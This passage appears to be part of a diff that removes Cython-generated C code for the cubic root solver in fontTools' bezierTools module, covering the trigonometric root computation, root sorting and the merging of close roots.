__pyx_int_0; - } else { - __Pyx_INCREF(__pyx_v_Q3); - __pyx_t_2 = __pyx_v_Q3; - } - __Pyx_DECREF_SET(__pyx_v_Q3, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":896 - * Q3 = 0 if abs(Q3) < epsilon else Q3 - * - * R2_Q3 = R2 - Q3 # <<<<<<<<<<<<<< - * - * if R2 == 0.0 and Q3 == 0.0: - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_R2, __pyx_v_Q3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 896, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_v_R2_Q3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":898 - * R2_Q3 = R2 - Q3 - * - * if R2 == 0.0 and Q3 == 0.0: # <<<<<<<<<<<<<< - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - */ - __pyx_t_7 = (__Pyx_PyFloat_BoolEqObjC(__pyx_v_R2, __pyx_float_0_0, 0.0, 0, 0)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 898, __pyx_L1_error) - if (__pyx_t_7) { - } else { - __pyx_t_4 = __pyx_t_7; - goto __pyx_L5_bool_binop_done; - } - __pyx_t_7 = (__Pyx_PyFloat_BoolEqObjC(__pyx_v_Q3, __pyx_float_0_0, 0.0, 0, 0)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 898, __pyx_L1_error) - __pyx_t_4 = 
__pyx_t_7; - __pyx_L5_bool_binop_done:; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":899 - * - * if R2 == 0.0 and Q3 == 0.0: - * x = round(-a1 / 3.0, epsilonDigits) # <<<<<<<<<<<<<< - * return [x, x, x] - * elif R2_Q3 <= epsilon * 0.5: - */ - __pyx_t_2 = PyNumber_Negative(__pyx_v_a1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_2, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_6)) __PYX_ERR(0, 899, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 899, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_x = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":900 - * if R2 == 0.0 and Q3 == 0.0: - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] # <<<<<<<<<<<<<< - * elif R2_Q3 <= epsilon * 0.5: - * # The epsilon * .5 above ensures that Q3 is not zero. 
- */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 900, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_v_x)) __PYX_ERR(0, 900, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_v_x)) __PYX_ERR(0, 900, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_v_x)) __PYX_ERR(0, 900, __pyx_L1_error); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":898 - * R2_Q3 = R2 - Q3 - * - * if R2 == 0.0 and Q3 == 0.0: # <<<<<<<<<<<<<< - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - */ - } - - /* "fontTools/misc/bezierTools.py":901 - * x = round(-a1 / 3.0, epsilonDigits) - * return [x, x, x] - * elif R2_Q3 <= epsilon * 0.5: # <<<<<<<<<<<<<< - * # The epsilon * .5 above ensures that Q3 is not zero. - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_2, __pyx_float_0_5); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyObject_RichCompare(__pyx_v_R2_Q3, __pyx_t_3, Py_LE); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 901, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":903 - * elif R2_Q3 <= epsilon * 0.5: - * # The epsilon * .5 above ensures that Q3 is not zero. 
- * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) # <<<<<<<<<<<<<< - * rQ2 = -2.0 * sqrt(Q) - * a1_3 = a1 / 3.0 - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_acos); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_8 = -1.0; - __pyx_t_9 = 1.0; - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_10 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_10, __pyx_v_Q3}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_v_R, __pyx_t_6); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_10 = PyFloat_FromDouble(__pyx_t_9); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_11 = PyObject_RichCompare(__pyx_t_10, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_11); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_11); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - if (__pyx_t_4) { - __pyx_t_11 = PyFloat_FromDouble(__pyx_t_9); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __pyx_t_6 = 
__pyx_t_11; - __pyx_t_11 = 0; - } else { - __Pyx_INCREF(__pyx_t_1); - __pyx_t_6 = __pyx_t_1; - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_INCREF(__pyx_t_6); - __pyx_t_1 = __pyx_t_6; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_11 = PyFloat_FromDouble(__pyx_t_8); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __pyx_t_10 = PyObject_RichCompare(__pyx_t_11, __pyx_t_1, Py_GT); __Pyx_XGOTREF(__pyx_t_10); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_10); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - if (__pyx_t_4) { - __pyx_t_10 = PyFloat_FromDouble(__pyx_t_8); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_6 = __pyx_t_10; - __pyx_t_10 = 0; - } else { - __Pyx_INCREF(__pyx_t_1); - __pyx_t_6 = __pyx_t_1; - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_6}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 903, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_theta = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":904 - * # The epsilon * .5 above ensures that Q3 is not zero. 
- * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - * rQ2 = -2.0 * sqrt(Q) # <<<<<<<<<<<<<< - * a1_3 = a1 / 3.0 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 904, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_Q}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 904, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = PyNumber_Multiply(__pyx_float_neg_2_0, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 904, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_rQ2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":905 - * theta = acos(max(min(R / sqrt(Q3), 1.0), -1.0)) - * rQ2 = -2.0 * sqrt(Q) - * a1_3 = a1 / 3.0 # <<<<<<<<<<<<<< - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - */ - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_a1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 905, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a1_3 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":906 - * rQ2 = -2.0 * sqrt(Q) - * a1_3 = a1 / 3.0 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 # <<<<<<<<<<<<<< - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, 
__pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_v_theta, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_6}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_2 = PyNumber_Multiply(__pyx_v_rQ2, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_t_2, __pyx_v_a1_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 906, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x0 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":907 - * a1_3 = a1 / 3.0 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 # <<<<<<<<<<<<<< - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 - * x0, x1, x2 = sorted([x0, x1, x2]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_pi); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = 
PyNumber_Multiply(__pyx_float_2_0, __pyx_t_6); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = PyNumber_Add(__pyx_v_theta, __pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_6, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_t_1}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_2 = PyNumber_Multiply(__pyx_v_rQ2, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_t_2, __pyx_v_a1_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x1 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":908 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 # <<<<<<<<<<<<<< - * x0, x1, x2 = sorted([x0, x1, x2]) - * # Merge roots that are 
close-enough - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_pi); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyNumber_Multiply(__pyx_float_4_0, __pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_v_theta, __pyx_t_6); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_6}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_2 = PyNumber_Multiply(__pyx_v_rQ2, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_t_2, __pyx_v_a1_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - 
__pyx_v_x2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":909 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 - * x0, x1, x2 = sorted([x0, x1, x2]) # <<<<<<<<<<<<<< - * # Merge roots that are close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - */ - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 909, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_v_x0)) __PYX_ERR(0, 909, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_v_x1)) __PYX_ERR(0, 909, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_v_x2)) __PYX_ERR(0, 909, __pyx_L1_error); - __pyx_t_3 = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - __pyx_t_12 = PyList_Sort(__pyx_t_3); if (unlikely(__pyx_t_12 == ((int)-1))) __PYX_ERR(0, 909, __pyx_L1_error) - if (1) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 909, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_6 = PyList_GET_ITEM(sequence, 1); - __pyx_t_1 = PyList_GET_ITEM(sequence, 2); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 909, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 909, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 909, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_1); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_2); - __pyx_t_2 = 0; - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_6); - __pyx_t_6 = 0; - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":911 - * x0, x1, x2 = sorted([x0, x1, x2]) - * # Merge roots that are close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: - */ - __pyx_t_3 = PyNumber_Subtract(__pyx_v_x1, __pyx_v_x0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyObject_RichCompare(__pyx_t_3, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_4 = __pyx_t_7; - goto __pyx_L8_bool_binop_done; - } - __pyx_t_6 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_x1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_6, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - 
